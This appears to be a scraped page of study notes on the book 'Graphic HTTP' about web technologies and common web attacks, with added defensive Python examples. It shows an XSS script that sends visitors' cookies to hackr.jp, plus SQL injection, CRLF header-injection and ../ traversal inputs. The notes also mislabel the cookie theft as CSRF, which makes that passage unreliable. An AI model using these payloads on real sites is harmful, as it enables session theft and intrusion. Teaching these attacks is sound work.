"Graphic http" 10, Chapter 11: Web-building technology, Web attack technology


10.2 Dynamic HTML

Dynamic HTML changes a Web page on the client side by calling the client-side scripting language JavaScript. The DOM (Document Object Model) is used to specify which elements are to be changed.

10.22 The DOM makes it easier to control the page

With the DOM, the elements of an HTML document are manipulated as objects.

10.3 Web applications

10.31 Web applications provide functionality through the Web.

10.32 CGI works together with the Web server

Common Gateway Interface (CGI): the mechanism by which the server, after receiving a request from a client, forwards it to an external program for processing.

10.4 Data publishing formats and languages

10.41 XML (Extensible Markup Language)

Data is recorded in a predefined markup, which makes XML better suited to recording structured data.

Reading data from an XML document is simpler than from HTML.

Because XML is essentially a tree structure delimited by tags, the data is easily read by having a parser parse the document and extract the data elements.

10.43 JSON, a lightweight format derived from JavaScript

JavaScript Object Notation.

A lightweight data markup language based on JavaScript's object notation.

11 Web attack technology

11.12 Requests can be tampered with on the client

Attack code is loaded into the request message:

The attack code is passed through URL query fields, form fields, HTTP headers, cookies and other means. If the application has a security vulnerability, internal information is stolen or the attacker gains administrative rights.

11.13 Attack patterns against Web applications
    • Active attack: attacks directly against resources on the server, e.g. SQL injection attacks and OS command injection attacks.
    • Passive attack: a trap is used to make the user execute the attack code, e.g. cross-site scripting (XSS) and cross-site request forgery (CSRF).
    1. The attacker lures the user into triggering a pre-set trap; the trap initiates an HTTP request with the attack code already embedded.
    2. Once the user is taken in, the browser or mail client triggers the trap.
    3. The browser sends the request carrying the attack code to the Web application under attack, which runs the attack code.
    4. Once the attack code has executed, a security vulnerability of the Web application becomes the attacker's springboard: the user's cookie and other information are stolen, the user's privileges in the logged-in state are abused, and so on.

11.2 Security vulnerabilities caused by incompletely escaped output values

Client-side validation:

JavaScript is mainly used for simple validation, as an aid, to improve the user experience. Because the user can disable JavaScript, it plays no role in security protection.

Web server-side validation:

    • Input value validation: attack code may be entered, so inputs must be checked for conformance with the business logic (character encoding, numeric values, etc.).
    • Escaping output values: escaping values before they are output is an important security measure.

11.21 Cross-site scripting attacks

Attackers use pre-set traps to trigger a passive attack (see an earlier post, the full-stack case).

JavaScript is executed by injecting a <script> tag, or by inserting other tags.

Example: stealing a cookie:

<script src="http://hackr.jp/xss.js"></script>

This line loads the JavaScript file at the given URL into the page; the src attribute specifies the URL of an external script file.

Contents of the JS file:

var content = encodeURI(document.cookie);          // read the current cookie
document.write("<img src=\"http://hackr.jp/?\"");  // line lost when the page was scraped; reconstructed from the description below
document.write(content);                           // append the cookie to the img URL
document.write("\">");                             // close the img tag

The first line reads the cookie, and the last three lines form an <img> tag whose src URL carries the cookie.

The attacker can post this script, e.g. as a comment, onto the vulnerable page; because there is no real picture at that URL, a broken-image icon is shown.

When a user visits the vulnerable page, the script runs: the <img> tag's src becomes a request carrying the user's current cookie to the attacker's website, where it is recorded in the access log.

Summary:

This is a cross-site request forgery (CSRF) attack, a variant of XSS.

CSRF is an attack method that forces a user to perform unintended operations on a Web application they are currently logged in to.
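As an added illustration of the escaping point in 11.2 and the cookie-stealing payload above (example code written for these notes, not from the book or its site): the same comment rendered without and with HTML escaping at output time, plus a server-side numeric check that does not rely on client-side JavaScript. Python stands in for the notes' JavaScript; the function names and the sample comment are constructed.

```python
import html

def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the stored comment is written into the page verbatim, so a
    <script> tag posted as a comment runs in every visitor's browser."""
    return f'<div class="comment">{comment}</div>'

def render_comment_safe(comment: str) -> str:
    """Hardened: escape at output time (11.2). <, >, &, " and ' become entities,
    so the browser shows the tag as text instead of executing it."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def render_link_safe(url: str) -> str:
    """Attribute context: quote the value and only accept http(s) URLs."""
    if not url.lower().startswith(("http://", "https://")):
        url = "about:blank"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'

def parse_quantity(value: str) -> int:
    """Server-side input validation (11.2): client-side JavaScript can be disabled,
    so the server re-checks character set and numeric range itself."""
    if not (value.isascii() and value.isdigit()) or not 1 <= int(value) <= 999:
        raise ValueError(f"invalid quantity: {value!r}")
    return int(value)

def is_valid_quantity(value: str) -> bool:
    try:
        parse_quantity(value)
        return True
    except ValueError:
        return False

# Constructed sample: a comment in the shape of the page's cookie-stealing payload.
SAMPLE_COMMENT = '<script src="http://hackr.jp/xss.js"></script> nice post'
```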

11.22 SQL injection attack

Web applications typically use a database, for example to retrieve data.

An attacker with a good command of SQL syntax enters a SQL fragment that causes deletion or some other effect into a search box; after clicking the Confirm button,

it combines with the application's built-in SQL to form a destructive SQL statement.

Note: the -- token is commonly used; it turns all of the following SQL into a comment.

In Rails, a special notation in the WHERE clause avoids this.

Example: Booktbi.where("author = ?", "xxx"): the database then knows that a quote, -- or semicolon inside the value is just plain data and does not act as SQL syntax.
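To make the Rails placeholder point concrete, here is an added example (not the book's code) in Python with the built-in sqlite3 module: the search-box value concatenated into SQL beside the same query with a ? placeholder. The table, rows and the injected input are constructed for the example.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the page's Book table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, author TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO books VALUES (?, ?, ?)",
        [("HTTP notes", "xxx", 0), ("Unpublished draft", "someone", 1)],
    )
    return conn

def find_titles_unsafe(conn: sqlite3.Connection, author: str) -> list[str]:
    """Vulnerable: the search-box value is pasted into the statement, so a quote
    closes the literal and -- comments out everything after it (hidden = 0 included)."""
    sql = f"SELECT title FROM books WHERE author = '{author}' AND hidden = 0"
    return [row[0] for row in conn.execute(sql)]

def find_titles_safe(conn: sqlite3.Connection, author: str) -> list[str]:
    """Hardened: a ? placeholder, the same idea as Rails' where("author = ?", value).
    The value travels separately from the SQL text, so ' and -- inside it are just data."""
    sql = "SELECT title FROM books WHERE author = ? AND hidden = 0"
    return [row[0] for row in conn.execute(sql, (author,))]

# Constructed search-box input in the shape the page describes (a quote, then the -- comment).
INJECTED_INPUT = "xxx' OR 1=1 --"
```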

11.23 OS command injection attack

Executing illegal operating system commands through a Web application to achieve the attacker's goal.

The risk exists wherever the application can call a shell function.

11.24 HTTP header injection attack

An attack in which the attacker inserts a line break into a response header field in order to add arbitrary headers or body to the response. (Passive attack)

    • Set arbitrary cookies
    • Redirect to an arbitrary URL
    • Show an arbitrary body: HTTP response splitting attack

Example: header injection attack

%0d%0a is the URL-encoded line break (CRLF).

Inserting it forces an extra Set-Cookie header into the response.

Once that cookie is set, the attacker can impersonate the user.

This is the first form of injection attack: inserting arbitrary header fields.

HTTP response splitting attack

The same procedure as the header injection attack, but two consecutive line breaks, %0d%0a%0d%0a, are sent after the inserted string.

Two consecutive line breaks produce the blank line that separates the HTTP headers from the body, so the body can be forged to achieve the attack's purpose.

<!-- marks the start of an HTML comment, which hides the remainder of the original body.
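An added example for the two attacks above (not code from the book): a redirect handler that concatenates a URL parameter into the Location header, beside a version that rejects any value containing a raw or %0d%0a-encoded line break, and a small parser that shows where a client would split headers from body. The parameter value is constructed in the shape the notes describe.

```python
from urllib.parse import unquote_plus

def has_crlf(value: str) -> bool:
    """True if a value headed for a response header contains a line break, raw or
    URL-encoded (%0d%0a): the injection vector the page describes."""
    decoded = unquote_plus(value)
    return "\r" in decoded or "\n" in decoded

def redirect_response_vulnerable(location_param: str) -> bytes:
    """Vulnerable: the decoded parameter is concatenated into the Location line unchecked."""
    return (b"HTTP/1.1 302 Found\r\nLocation: " + unquote_plus(location_param).encode()
            + b"\r\n\r\nmoved")

def redirect_response_safe(location_param: str) -> bytes:
    """Hardened: refuse any value that could start a new header line or a new body."""
    if has_crlf(location_param):
        raise ValueError("line break in header value")
    return redirect_response_vulnerable(location_param)  # same framing, value now checked

def safe_accepts(location_param: str) -> bool:
    try:
        redirect_response_safe(location_param)
        return True
    except ValueError:
        return False

def split_response(raw: bytes) -> tuple[list[bytes], bytes]:
    """Parse as a client would: header lines up to the first blank line, then the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.split(b"\r\n"), body

# Constructed redirect parameter: one %0d%0a inserts a Set-Cookie header, two in a row
# end the header block so everything after them is read as the body.
INJECTED_PARAM = "http://example.com/%0d%0aSet-Cookie:+SID=123456789%0d%0a%0d%0a<html>forged</html>"
```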

11.25 Message Header Injection attack

11.26 Directory traversal attack

An attack in which the attacker reaches files that should not be accessible by illegally constructing a directory path.

Relative paths such as ../ are used to reach an absolute path such as /etc/passwd, so that the file on the server is accessed.

The attacker can then browse, tamper with or delete the content on the server at will, haha.

The ability to specify arbitrary file names for access should be disabled.
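An added example (not from the book) of the two mitigations just described, in Python: resolving a requested file name against the document root and refusing anything that ends up outside it, and the stricter option of not accepting file names at all but mapping fixed keys to files. The root path and the allowlist are constructed.

```python
import os

def resolve_under_root(root: str, requested: str) -> str:
    """Map a user-supplied file name onto the document root and refuse anything that
    resolves outside it, whether via ../ segments, an absolute path, or a symlink."""
    root_real = os.path.realpath(root)
    # join() lets an absolute 'requested' replace the root; realpath() collapses ../ segments
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"path escapes document root: {requested!r}")
    return candidate

def is_allowed(root: str, requested: str) -> bool:
    try:
        resolve_under_root(root, requested)
        return True
    except (PermissionError, ValueError):
        return False

# Stricter alternative, in the spirit of the notes' advice: the request carries a key,
# never a file name, and only these keys map to files (constructed allowlist).
FILE_MAP = {"index": "index.html", "about": "about.html"}

def path_for_key(root: str, key: str) -> str:
    return resolve_under_root(root, FILE_MAP[key])
```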

11.4 Session management security vulnerabilities

11.41 Session hijacking
    • Guessing session IDs produced by a non-standard (predictable) generation method
    • Stealing the session ID through eavesdropping or an XSS attack
    • Forcibly obtaining the session ID through session fixation

The attacker obtains the user's session ID by one of these means and impersonates the user.
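An added example (not from the book) covering the three bullets above in Python: a session store that draws IDs from the OS random generator instead of a counter, issues a fresh ID at login so a planted (fixated) ID never becomes a logged-in session, and sets cookie attributes that keep the ID away from scripts and plaintext HTTP. The store and cookie name are constructed.

```python
import secrets

class SessionStore:
    """Minimal server-side session store, constructed for these notes."""

    def __init__(self) -> None:
        self._sessions: dict[str, dict] = {}

    @staticmethod
    def new_id() -> str:
        # 32 bytes from the OS CSPRNG: a guessing attack (first bullet) has no pattern to exploit
        return secrets.token_urlsafe(32)

    def create(self) -> str:
        sid = self.new_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid: str, user: str) -> str:
        """Session fixation defence (third bullet): the ID presented before login may have
        been planted by the attacker, so discard it and issue a fresh one for the logged-in state."""
        state = self._sessions.pop(presented_sid, {"user": None})
        new_sid = self.new_id()
        self._sessions[new_sid] = {**state, "user": user}
        return new_sid

    def user_for(self, sid: str):
        return self._sessions.get(sid, {}).get("user")

def session_cookie(sid: str) -> str:
    """Set-Cookie attributes for the ID: HttpOnly keeps it out of document.cookie (XSS
    theft, second bullet), Secure keeps it off plaintext HTTP (eavesdropping)."""
    return f"SID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

def weak_id(counter: int) -> str:
    """Anti-pattern from the first bullet: a sequential ID is trivially guessable."""
    return f"SID{counter:06d}"

def fixation_demo() -> tuple[bool, bool]:
    """A planted ID must not become a logged-in session; the freshly issued one must."""
    store = SessionStore()
    new_sid = store.login("planted-by-attacker", "alice")
    return store.user_for("planted-by-attacker") is None, store.user_for(new_sid) == "alice"
```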

11.5 Other security vulnerabilities

11.51 Password cracking

Cracking the stored (encrypted) passwords:

Stored passwords are protected by processing with a hash function or by adding a salt.

11.52 Clickjacking

A transparent button or link is overlaid on a Web page as a trap, luring users to click it without knowing what they are clicking.

Also called UI redressing (interface camouflage).

Other security vulnerabilities:

DoS attacks, backdoor programs.

"Graphic http" 10, Chapter 11: Web-building technology, Web attack technology

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.